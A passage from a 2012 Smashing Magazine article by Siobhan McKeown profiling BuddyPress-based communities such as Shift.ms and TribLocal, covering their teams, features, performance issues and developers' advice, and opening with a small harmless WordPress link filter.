     $return = str_replace('<a target = "_blank" href = "#', '<a href = "#', $return);
     $return = str_replace(' target = "_blank">', '>', $return);
     return $return;
}
add_filter('the_content', 'shiftms_openlinks');
add_filter('comment_text', 'shiftms_openlinks');

In addition to BuddyPress, Shift.ms finds Gravity Forms useful because it lets non-technical team members have control of forms.

Advice

I asked Shift.ms if it has any advice for someone starting a BuddyPress community. Here’s what it had to say:

BuddyPress developers are few and far between at the moment, but their number is growing fast. I’d say get someone in who has specific BuddyPress experience; WordPress knowledge is fantastic, but there are a number of significant differences.

Free Pass

For users, George would like to see a map integrated into core so that he can show where all members reside. Developer Tammie Lister would like to see more privacy controls. She’d like to give users more control over what is publicly displayed, which would help them feel safer in these more personal communities.

The One that Got Away: TribLocal

Current membership: 100,000

TribLocal is designed to collect and deliver local news via 88 community websites covering the Chicago suburbs. I spoke to developer Tom Willmot, of Human Made, the development shop behind the website. Many of the visitors show up just to read headlines, check out the police blotter or click through the photo galleries of news and events in their neighborhood. More engaged users sign up for accounts to post their own stories and event listings, which the production staff moderate and consider for the home page. Like any blog, this one has comments, social-media sharing tools, RSS and member profiles. In additional to original reporting and community contributions, TribLocal has an aggregation strategy to highlight interesting local news elsewhere.

The Team

In addition to the development team that handles the technical side of things, the community is run by a team of community producers. The news team writes articles for the various local websites, moderates articles submitted by the local journalists and chooses the best ones for inclusion in the weekly newspaper.

Why BuddyPress?

The TribLocal websites were originally built with a custom solution. When Human Made came on board, the client had already decided to replace its existing solution with WordPress Multisite and BuddyPress. The key element that BuddyPress brought to the table was to put user log-ins and profiles on the front end. BuddyPress provides this out of the box.

How It Works

The community producers review content that is submitted via the website and decide whether to promote it on the home page of the website or run it in the following week’s newspaper via a reverse-publishing system. In addition, producers also monitor the website for things like terms-of-service issues.

Members can add events through the front end of the website.

Members can publish three post types:

• Stories,
• Photo galleries,
• Calendar events.

Events have been the most popular. A home page calendar shows upcoming events, and users can download the ICS file.

Members’ events appear on the home page.

Other features are:

• A photo section to encourage users to post their photographs. Shots of severe weather in the Chicago area have been particularly popular.
• A voting system for high school athlete of the month, local volunteer recognition and other initiatives.
• Members becoming regular contributors, with some having their own official blogs covering areas of local interest.

I asked Tom how the members interact with each other:

As far as member-to-member interaction, we had @mentions, which I think are standard to BuddyPress. While we had open registration, member pages, etc., we didn’t activate the feature for people to friend/follow each other. So, in that sense, maybe it wasn’t a true “social network in a box,� but it was an innovative way to engage people in the news and really unlike anything else in local community journalism.

A key requirement was to have user-generated content. Users needed to be able to act as authors, with the ability to post news, photo galleries and events from the front end. This required extending BuddyPress’ user profiles beyond simply logging in and recreating something resembling WordPress’ back-end functionality for users.

Leaving BuddyPress

Human Made has had issues using BuddyPress, not because of any inherent problem in BuddyPress itself, but because it had more functionality than was needed. The client had preselected BuddyPress, so they were stuck with it. The development team only needed the user log-in and profile features, so a lot of features and associated code were superfluous to the project.

This meant that the website had some performance issues due to the number of queries generated by BuddyPress. The client’s internal system prevented them from using Memcached, so instead they used a combination of Varnish for full-page caching and flat HTML fragment caching for widgets and comments. The heavy customization of BuddyPress caused problems when it came time to upgrade the plugin: BuddyPress changed fundamentally between versions, and the team was unable to update to the latest version.

Advice

Tom has this advice for anyone starting a BuddyPress community:

We would advise them to start with BuddyPress at the outset. We had limitations because the client had already designed the site, which restricted how we were able to approach the development. Ideally, the theme and development would be built to work integrally with BuddyPress, rather than having to adapt existing concepts.

Free Pass

If Tom had one free pass, he’d love to see BuddyPress more closely follow WordPress’ core architecture and APIs.

Conclusion

If there’s one commonality among these successful BuddyPress installations, it’s the people behind them. From Michelle’s passion for music journalism and improving student literacy, to Kate’s desire for a community for Telegraph readers, to the CUNY ethos of providing a collaborative working space for staff and students, to George’s aim to provide support for MS sufferers, these communities were started by passionate people who wanted to create a forum for other passionate people to converse, to work towards a shared goal, or to share advice and support each other. The BuddyPress plugin is wonderful, but the personal passion is what really drives these communities.

Resources

If you’re thinking of starting a community and you’ve got the drive for it, check out some of these resources to help you get started with BuddyPress:

• “25 Cool BuddyPress Themes to Start a Community,â€� Dustin Betonio, Tripwire Magazine
• “Create a Social Network With WordPress and BuddyPress,â€� Oliver Dale, WPLift

You could also take a trip to the first BuddyCamp, which is happening this October in Vancouver.

(al)

---

© Siobhan McKeown for Smashing Magazine, 2012.